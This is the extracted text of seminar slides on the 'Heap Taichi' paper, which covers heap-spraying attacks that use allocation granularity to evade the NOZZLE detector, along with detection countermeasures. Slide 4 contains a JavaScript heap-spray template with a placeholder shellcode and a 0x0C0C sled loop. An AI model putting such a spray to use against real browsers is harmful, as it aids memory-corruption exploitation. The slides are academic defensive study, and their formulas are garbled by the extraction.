Heap Taichi : Exploiting Memory Allocation Granularity in Heap-Spraying Attacks

Heap Taichi: Exploiting Memory Allocation Granularity in

Heap-Spraying AttacksYu Ding, Tao Wei, TieLei Wang

Peking UniversityZhenkai Liang

National University of SingaporeWei Zou

Peking University26th ACSAC (December, 2010)

A Seminar at Advanced Defense Lab 2

OutlineIntroductionResearch ApproachesHeap Spraying with Little Surface AreaExperiment and Evaluation

A Seminar at Advanced Defense Lab 3

IntroductionA news from Microsoft Security Research &

Defense2010/12/20http://blogs.technet.com/b/srd/archive/2010/12/

22/new-internet-explorer-vulnerability-affecting-all-versions-of-ie.aspx

A Seminar at Advanced Defense Lab 4

Heap

Heap Spray

MemoryCorruption

Heap is less predictable, and some mechanism for

randomizing the heap layout

NOP Sled

Shellcode

NOP Sled

Shellcode

NOP Sled

Shellcode

NOP Sled

Shellcode

<SCRIPT language="text/javascript"> shellcode = unescape("%u4343%u4343%...''); oneblock = unescape("%u0C0C%u0C0C"); var fullblock = oneblock; while (fullblock.length<0x40000) { fullblock += fullblock; }

sprayContainer = new Array(); for (i=0; i<1000; i++) { sprayContainer[i] = fullblock + shellcode; }</SCRIPT>

A Seminar at Advanced Defense Lab 5

Heap spraying (cont.)Why spraying?

We need to jump into the object.

Why NOP-sled?We need to execute first instruction in the

shellcode.

A Seminar at Advanced Defense Lab 6

Research ApproachesShellcode-oriented

But … “English Shellcode”? (my opinion)

Sled-orientedNOZZLE

Advanced Defense Lab 7

The Design of NOZZLENOZZLE attempts to discover objects in

which control flow through the object (the NOP sled) frequently reaches the same basic block(s) (the shellcode.)

object

disassemble

Control Flow Graph

8

The Design of NOZZLE (cont.)Compute the attack surface area of object o

as:

The attack surface area of heap containing n objects is defined as follows:

The normalized attack surface area of heap

Advanced Defense Lab

)),(max()( CBBSAoSA ii

ni

ioSAHSA,,1

)()(

HHSAHNSA )()(

Advanced Defense Lab 9

Limitation (In The Paper of NOZZLE)Jump into Page

Attacker allocates page-size chunk of memoryPage-size

Shellcode

Page-size

Shellcode

Page-size

Shellcode

Page alignment

Page alignment

Fixed offset!!

The goal of this paper!!

A Seminar at Advanced Defense Lab 10

Heap Spraying with Little Surface AreaMemory Allocation Granularity

Linux: 4KBWindows: 64KB

When a heap object is bigger than a certain threshold, 512K in our experiment, Windows always allocates a separate heap block for this object.

A Seminar at Advanced Defense Lab 11

ObservationIf an EIP assigned by an attacker have few

possible locations in a large heap object, the attacker only need to put jump-equivalent instructions at those locations.In fact, an EIP assigned by an attacker can only

point to EIGHT possible locations in a 512K-byte heap object

A Seminar at Advanced Defense Lab 12

A Seminar at Advanced Defense Lab 13

Malicious Heap Object

A Seminar at Advanced Defense Lab 14

If the alignment is small

A Seminar at Advanced Defense Lab 15

Detecting Heap Taichi AttacksNOZZLE can be enhanced to detect some of

the new attacks by considering the effect of memory allocation granularity.

A Seminar at Advanced Defense Lab 16

Detecting Heap Taichi Attacks(cont.)A natural solution to prevent Heap Taichi

attacks and similar attacks is to aligning memory allocation at a smaller-sized boundary.

But … there are many heap managers on different levels of a program, each of which has its own heap management strategy.

A Seminar at Advanced Defense Lab 17

Experiment and EvaluationCase study:

A Seminar at Advanced Defense Lab 18

A Seminar at Advanced Defense Lab 19

Result

A Seminar at Advanced Defense Lab 20

Thank You